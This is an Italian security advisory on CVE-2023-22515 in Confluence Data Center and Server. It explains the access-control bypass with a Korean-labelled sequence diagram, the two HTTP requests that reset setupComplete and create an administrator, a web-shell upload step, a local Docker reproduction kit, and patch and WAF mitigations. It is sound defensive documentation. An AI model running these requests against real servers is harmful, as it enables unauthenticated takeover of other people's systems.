
[!IMPORTANT] Avviso di sicurezza urgente: questa vulnerabilità ha un punteggio CVSS 10.0 (Critical), il massimo livello di rischio. Se si utilizza una versione interessata, è necessaria una patch immediata.
CVE-2023-22515 è una vulnerabilità critica di Broken Access Control scoperta in Atlassian Confluence Data Center e Server. Un attaccante può manipolare da remoto lo stato di configurazione del server senza autenticazione, creare un account amministratore e ottenere il pieno controllo del sistema.
| Elemento | Dettagli |
|---|---|
| ID vulnerabilità | CVE-2023-22515 |
| Livello di rischio | CRITICAL (CVSS 10.0) |
| Versioni interessate | 8.0.0 ~ 8.5.1 (verificare le versioni specifiche) |
| Tipo di attacco | Bypass dell'autenticazione ed escalation dei privilegi |
Questa vulnerabilità viene attivata quando un attaccante modifica il valore bootstrapStatusProvider.applicationConfig.setupComplete in false tramite l'endpoint /server-info.action.
sequenceDiagram
participant Attacker as 😈 공격자
participant Server as 🖥️ Confluence 서버
participant Config as ⚙️ 설정 관리자
Note over Attacker, Server: 1단계: 설정 상태 초기화 공격
Attacker->>Server: GET /server-info.action?setupComplete=false
Server->>Config: 메모리 상의 설정 완료 플래그 해제
Config-->>Server: 상태 변경 완료 (설치 모드로 전환)
Server-->>Attacker: HTTP 200/302 OK
Note over Attacker, Server: 2단계: 관리자 계정 생성
Attacker->>Server: POST /setup/setupadministrator.action<br/>(새로운 관리자 정보 전송)
Server->>Server: 보안 검증 우회 (설치 모드라 허용됨)
Server-->>Attacker: 계정 생성 성공 및 로그인
Note over Attacker, Server: 3단계: 시스템 장악 (RCE)
Attacker->>Server: 악성 플러그인 업로드 (Web Shell)
Server-->>Attacker: 원격 명령 실행 권한 획득
[!NOTE] Principio chiave: non modifica il file di configurazione permanente (
confluence.cfg.xml), ma altera lo stato runtime in memoria per aggirare la logica di controllo degli accessi.
È causata da una vulnerabilità di parameter binding nel framework XWork2 e dalla mancata convalida dell'input esterno per l'attributo sensibile (setupComplete) nella classe Action (ServerInfoAction) di Confluence.
Un attaccante può compromettere il server con una semplice richiesta HTTP.
1. Richiesta di inizializzazione della configurazione:
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: target-confluence.com
2. Richiesta di creazione dell'amministratore:
POST /setup/setupadministrator.action HTTP/1.1
...
username=hacker_admin&password=P@ssw0rd123...
È possibile esercitarsi sulla vulnerabilità in un ambiente Docker sicuro utilizzando il kit di riproduzione (cve-2023-22515-repro) fornito con questo report.
È incluso uno script demo che consente di osservare visivamente il processo di hacking reale nel terminale.
# 데모 실행 명령어
bash cinematic_pwn.sh
[!TIP] Lo script demo automatizza l'intero processo: esegue l'attacco contro un server reale (
localhost:8090), crea un account amministratore e tenta il login.
La soluzione più affidabile è l'aggiornamento a una versione corretta fornita da Atlassian.
Se non è possibile applicare la patch, bloccare l'accesso ai seguenti pattern URL tramite dispositivi di sicurezza di rete (WAF, load balancer, ecc.).
*/setup/*CVE-2023-22515 è una vulnerabilità critica che consente il pieno controllo del sistema con una difficoltà di attacco molto bassa. I responsabili della sicurezza devono applicare immediatamente la patch e monitorare eventuali segni di compromissione.
Data di redazione: 2026-01-16 | Autore: Antigravity Security Analysis Team